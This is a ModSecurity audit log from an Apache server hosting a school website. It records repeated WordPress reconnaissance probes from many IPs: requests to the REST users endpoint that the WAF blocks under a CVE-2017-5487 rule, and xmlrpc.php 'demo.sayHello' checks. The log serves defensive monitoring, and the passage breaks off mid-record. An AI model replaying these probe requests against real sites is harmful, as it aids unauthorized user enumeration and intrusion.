combined=1570, p1=574, p2=956, p3=0, p4=0, p5=40, sr=142, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b72f3904-Z-- --d102a00a-A-- [17/May/2025:04:48:10 +0700] aCeymgTOsBn9MSWb6WJqAwAAAJg 103.236.140.4 56162 103.236.140.4 8181 --d102a00a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.85.248 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.85.248 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d102a00a-C-- demo.sayHello --d102a00a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d102a00a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747432090559885 5723 (- - -) Stopwatch2: 1747432090559885 5723; combined=4216, p1=625, p2=3348, p3=33, p4=30, p5=109, sr=157, sw=71, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d102a00a-Z-- --15c03260-A-- [17/May/2025:04:55:32 +0700] aCe0VATOsBn9MSWb6WJqBwAAAIg 103.236.140.4 56232 103.236.140.4 8181 --15c03260-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.86.198 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.86.198 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --15c03260-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --15c03260-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747432532362091 3129 (- - -) Stopwatch2: 1747432532362091 3129; combined=1353, p1=447, p2=877, p3=0, p4=0, p5=29, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --15c03260-Z-- --76d37a40-A-- [17/May/2025:04:55:36 +0700] aCe0WOm4kjNN-hEbWjI8XAAAAEo 103.236.140.4 56238 103.236.140.4 8181 --76d37a40-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.178.255 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.178.255 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --76d37a40-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --76d37a40-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747432536530613 2839 (- - -) Stopwatch2: 1747432536530613 2839; combined=1242, p1=426, p2=786, p3=0, p4=0, p5=30, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --76d37a40-Z-- --5362ec38-A-- [17/May/2025:04:55:37 +0700] aCe0WXyxdQCiyU1ENFciOQAAABM 103.236.140.4 56240 103.236.140.4 8181 --5362ec38-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.86.198 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.86.198 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --5362ec38-C-- demo.sayHello --5362ec38-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --5362ec38-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747432537897677 5205 (- - -) Stopwatch2: 1747432537897677 5205; combined=3993, p1=440, p2=3321, p3=35, p4=34, p5=94, sr=67, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5362ec38-Z-- --1b2efc2a-A-- [17/May/2025:04:55:40 +0700] aCe0XHyxdQCiyU1ENFciOwAAABY 103.236.140.4 56246 103.236.140.4 8181 --1b2efc2a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.178.255 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.178.255 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --1b2efc2a-C-- demo.sayHello --1b2efc2a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --1b2efc2a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747432540607492 6403 (- - -) Stopwatch2: 1747432540607492 6403; combined=4588, p1=581, p2=3769, p3=39, p4=42, p5=94, sr=78, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1b2efc2a-Z-- --f29da640-A-- [17/May/2025:04:55:59 +0700] aCe0bwTOsBn9MSWb6WJqCgAAAIw 103.236.140.4 56254 103.236.140.4 8181 --f29da640-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.109.87 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.109.87 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f29da640-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f29da640-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747432559054618 3421 (- - -) Stopwatch2: 1747432559054618 3421; combined=1458, p1=482, p2=944, p3=0, p4=0, p5=32, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f29da640-Z-- --58f0e33d-A-- [17/May/2025:04:56:05 +0700] aCe0dem4kjNN-hEbWjI8XgAAAEw 103.236.140.4 56258 103.236.140.4 8181 --58f0e33d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.109.87 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.109.87 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --58f0e33d-C-- demo.sayHello --58f0e33d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --58f0e33d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747432565922265 6684 (- - -) Stopwatch2: 1747432565922265 6684; combined=4650, p1=634, p2=3774, p3=32, p4=35, p5=102, sr=99, sw=73, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --58f0e33d-Z-- --3a4e7843-A-- [17/May/2025:04:58:59 +0700] aCe1IxKi5m5upc8uMd6eNgAAAM8 103.236.140.4 56266 103.236.140.4 8181 --3a4e7843-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.83.209 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.83.209 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3a4e7843-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3a4e7843-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747432739877993 3361 (- - -) Stopwatch2: 1747432739877993 3361; combined=1379, p1=510, p2=840, p3=0, p4=0, p5=29, sr=91, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3a4e7843-Z-- --51337719-A-- [17/May/2025:04:59:04 +0700] aCe1KBKi5m5upc8uMd6eOAAAANE 103.236.140.4 56270 103.236.140.4 8181 --51337719-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.83.209 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.83.209 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --51337719-C-- demo.sayHello --51337719-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --51337719-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747432744759848 5844 (- - -) Stopwatch2: 1747432744759848 5844; combined=4221, p1=579, p2=3416, p3=29, p4=32, p5=97, sr=85, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --51337719-Z-- --45e4bc2c-A-- [17/May/2025:04:59:20 +0700] aCe1OHyxdQCiyU1ENFciPgAAAAI 103.236.140.4 56282 103.236.140.4 8181 --45e4bc2c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.162.109 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.162.109 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --45e4bc2c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --45e4bc2c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747432760600863 2803 (- - -) Stopwatch2: 1747432760600863 2803; combined=1237, p1=437, p2=769, p3=0, p4=0, p5=30, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --45e4bc2c-Z-- --3c841c22-A-- [17/May/2025:04:59:29 +0700] aCe1Qem4kjNN-hEbWjI8ZAAAAFQ 103.236.140.4 56286 103.236.140.4 8181 --3c841c22-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.162.109 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.162.109 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3c841c22-C-- demo.sayHello --3c841c22-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3c841c22-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747432769395336 6520 (- - -) Stopwatch2: 1747432769395336 6520; combined=4680, p1=588, p2=3858, p3=36, p4=38, p5=96, sr=80, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3c841c22-Z-- --bb925500-A-- [17/May/2025:05:00:21 +0700] aCe1dXyxdQCiyU1ENFciQAAAAAU 103.236.140.4 56296 103.236.140.4 8181 --bb925500-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.89.175 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.89.175 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --bb925500-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bb925500-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747432821226549 3359 (- - -) Stopwatch2: 1747432821226549 3359; combined=1446, p1=486, p2=918, p3=0, p4=0, p5=42, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bb925500-Z-- --1b2d2534-A-- [17/May/2025:05:00:25 +0700] aCe1eXyxdQCiyU1ENFciQgAAAAc 103.236.140.4 56300 103.236.140.4 8181 --1b2d2534-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.89.175 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.89.175 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --1b2d2534-C-- demo.sayHello --1b2d2534-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --1b2d2534-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747432825386844 6536 (- - -) Stopwatch2: 1747432825386844 6536; combined=4722, p1=632, p2=3876, p3=36, p4=41, p5=83, sr=83, sw=54, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1b2d2534-Z-- --ab4a910d-A-- [17/May/2025:05:01:42 +0700] aCe1xum4kjNN-hEbWjI8ZgAAAFg 103.236.140.4 56308 103.236.140.4 8181 --ab4a910d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.181.209 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.181.209 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --ab4a910d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ab4a910d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747432902210958 3658 (- - -) Stopwatch2: 1747432902210958 3658; combined=1610, p1=556, p2=1022, p3=0, p4=0, p5=32, sr=122, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ab4a910d-Z-- --73c09e49-A-- [17/May/2025:05:01:48 +0700] aCe1zBKi5m5upc8uMd6eOgAAANU 103.236.140.4 56314 103.236.140.4 8181 --73c09e49-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.181.209 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.181.209 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --73c09e49-C-- demo.sayHello --73c09e49-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --73c09e49-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747432908008696 5932 (- - -) Stopwatch2: 1747432908008696 5932; combined=4250, p1=562, p2=3456, p3=31, p4=34, p5=98, sr=79, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --73c09e49-Z-- --b41a1537-A-- [17/May/2025:05:01:48 +0700] aCe1zOm4kjNN-hEbWjI8aQAAAEQ 103.236.140.4 56316 103.236.140.4 8181 --b41a1537-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.112.97 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.112.97 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b41a1537-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b41a1537-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747432908400447 2720 (- - -) Stopwatch2: 1747432908400447 2720; combined=1191, p1=396, p2=767, p3=0, p4=0, p5=28, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b41a1537-Z-- --b0256730-A-- [17/May/2025:05:01:53 +0700] aCe10XyxdQCiyU1ENFciRAAAAAo 103.236.140.4 56322 103.236.140.4 8181 --b0256730-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.112.97 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.112.97 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --b0256730-C-- demo.sayHello --b0256730-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --b0256730-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag 